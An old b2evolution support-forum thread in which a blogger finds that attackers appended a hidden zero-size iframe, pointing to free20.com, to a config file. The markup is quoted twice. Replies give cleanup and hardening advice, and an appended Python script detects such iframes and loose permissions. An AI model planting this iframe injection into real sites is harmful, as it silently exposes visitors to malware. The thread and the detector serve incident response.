1 Sep 10, 2007 18:23    

My b2evolution Version: Not Entered

Hi all

I have picked up a serious 'bug/malware/badware' problem in my blog.
I recently added a newsreader widget to my sidebar. After about a week of using this widget I removed it because of problems. But now I am getting this error when checking my RSS feeds. I have no idea where I got the 'www.free20' link from, and I am getting alerts from Google that my site contains malware or badware.
I have used Firebug for Firefox to look for the 'www.free20' link in my blog, but I can't find it anywhere in my blog files. It's driving me crazy that it's in there somewhere, but I can't find it.
If anybody could help me out and steer me in the right direction, I would greatly appreciate it.

XML Parsing Error: not well-formed
Location: http://vicezilla.com/views/index.php?tempskin=_rdf
Line Number 1, Column 21:<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
--------------------^

2 Sep 10, 2007 18:40

Not much time now, but I shall give you a clue:
Open ../blogs/skins/_rdf/_main.php and search for the line in the error: <iframe [......] </frame>
and delete it.

You can also replace the contents of the folder ../blogs/skins/_rdf/ by the same folder from a fresh download.

Good luck

3 Sep 10, 2007 19:03

and it should be added that if there is a link added to a file that you didn't add, then your file(s) have been compromised.

<iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>

you can google "free20" without the quotes and see a few references to it that describe similar occurrences.

Lastly, this isn't an RSS issue.. that paste is right out of the top of your front page. I'm changing the title of this post.

4 Sep 11, 2007 05:45

Thanks for all of your help in this issue. After a full day of searching for this piece of iframe code I finally found it at the very bottom of the _basic_config file. I deleted it and all is well again. But now for my next problem...how can I prevent this from happening again? Obviously somebody got access to this file and added the code.
Other than changing passwords for both control panel and FTP access is there anything else that can be done to prevent this from happening again?
Again, any help is greatly appreciated.

5 Sep 11, 2007 05:47

For starters, make sure your file permissions are safe and sane

directories: 755
files: 644

that's the very loosest permissions you should have.

6 Sep 11, 2007 07:15

Thanks for the input whoo. That was the first thing I checked, and strangely enough the only file that didn't have the permissions you stated was the _basic_config file. It was set at 666.
Whether or not the permission was set at 666 before or after the hack, I'm not sure, but I'll be keeping a close eye on them for a while to see if there is any other suspicious activity in the coming days.

7 Sep 11, 2007 07:25

you're missing one important thing. if they were able to edit that file, they were able to read it.

It contains mysql information.

You need to ensure that your mysql password is changed.

8 Sep 12, 2007 07:47

Yeah I was shocked to find that information so out in the open, so it was changed ASAP before I deleted the code in the file.
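
Added example, not part of the original thread: a small audit script that walks a site directory and reports the two things this thread turned up, a zero-size iframe appended to a file and permissions looser than the 755/644 limits given above. The function names, the `conf/_basic_config.php` sample path and the `example.invalid` URL are constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Zero-size iframe like the one quoted in the thread (width=0 height=0).
HIDDEN_IFRAME = re.compile(
    rb"<iframe\b[^>]*\b(?:width|height)\s*=\s*[\"']?0(?:px)?[\"'\s>]", re.I)


def audit(root):
    """Walk root; return (path, issue) for loose modes and hidden iframes."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in sorted(dirnames + filenames):
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # symlink modes are meaningless; check real files only
            limit = 0o755 if stat.S_ISDIR(st.st_mode) else 0o644  # thread's limits
            mode = stat.S_IMODE(st.st_mode) & 0o777
            if mode & ~limit:
                findings.append((path, "mode %03o looser than %03o" % (mode, limit)))
            if not stat.S_ISREG(st.st_mode):
                continue
            try:
                with open(path, "rb") as fh:
                    for lineno, line in enumerate(fh, 1):
                        if HIDDEN_IFRAME.search(line):
                            findings.append((path, "hidden iframe at line %d" % lineno))
            except OSError as exc:
                findings.append((path, "unreadable: %s" % exc.strerror))
    return findings


def build_sample(root):
    """Constructed sample: a config file at mode 666 with an iframe appended."""
    os.mkdir(os.path.join(root, "conf"), 0o755)
    path = os.path.join(root, "conf", "_basic_config.php")
    with open(path, "wb") as fh:
        fh.write(b"<?php\n$db_pass = 'x';\n?>"
                 b"<iframe width=0 height=0 src=http://example.invalid/></iframe>\n")
    os.chmod(path, 0o666)
    return path


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(*audit(tmp), sep="\n")
```

Running `audit()` against the real blog directory on a schedule and comparing the output between runs gives an early signal if a file is modified or its mode changes again.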

